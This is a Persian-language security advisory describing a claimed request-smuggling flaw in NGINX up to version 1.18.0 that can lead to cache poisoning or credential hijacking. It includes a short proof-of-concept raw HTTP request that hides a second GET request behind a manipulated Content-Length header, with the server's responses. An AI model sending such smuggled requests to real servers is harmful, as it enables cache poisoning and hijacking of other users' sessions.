NGINX وب سروری متن باز و رایگان است که بسیاری از دامنههای فعال را میزبانی میکند. Nginx به عنوان متعادل کننده بارگزاری یا load balancer، وب سرور و HTTP cache استفاده میشود. پروژه Nginx دارای کارایی و عملکرد بالا و استفاده کمتر و بهینه شده از حافظه میباشد. این وب سرور بر روی سیستمعاملهای مختلفی از جمله AIX, HP-UX، Solaris، OS X، Linux و انواع BSD اجرا میگردد.
از وب سرور NGINX میتوان به عنوان پروکسی معکوس با وب سرور Apache استفاده کرد تا همزمان از قدرت Apache و سرعت NGINX استفاده کند.
اخیراً یک آسیبپذیری بحرانی در وب سرورهای NGINX تا نسخه 1.18.0 یافت شده است. علت این مسئله یک عملکرد ناشناخته است. این آسیبپذیری با جعل و دستکاری درخواست HTTP و افزایش دسترسی، باعث حمله cache poisoning، hijack کردن اعتبارها یا دور زدن امنیت میشود. این آسیبپذیری در 14 مه کشف شده و جزییات فنی آن منتشر نشده است. در مورد اقدامات متقابل احتمالی اطلاعاتی در دست نیست.
1 کد PoC
در شکل زیر با توجه به این که محتوای درخواست به صورت text است، اطلاعات header مربوط به کد html قابل مشاهده و جعل یا دستکاری میباشد.
:Request
GET /test.html HTTP/1.1Host: localhostContent-Length: 2 GET /poc.html HTTP/1.1Host: localhostContent-Length: 15
:Response
HTTP/1.1 200 OKServer: nginx/1.18.0Date: Fri, 01 May 2020 18:28:44 GMTContent-Type: text/htmlContent-Length: 33Last-Modified: Thu, 30 Apr 2020 14:36:32 GMTConnection: keep-aliveETag: “5eaae270-21″Accept-Ranges: bytes <html><h1>Test Page!</h1></html>HTTP/1.1 200 OKServer: nginx/1.18.0Date: Fri, 01 May 2020 18:28:44 GMTContent-Type: text/htmlContent-Length: 15Last-Modified: Thu, 30 Apr 2020 14:35:41 GMTConnection: keep-aliveETag: “5eaae23d-f”Accept-Ranges: bytes NGINX PoC File
2 مراجع
[PoC]
[2]
[3]
[4]
[5]
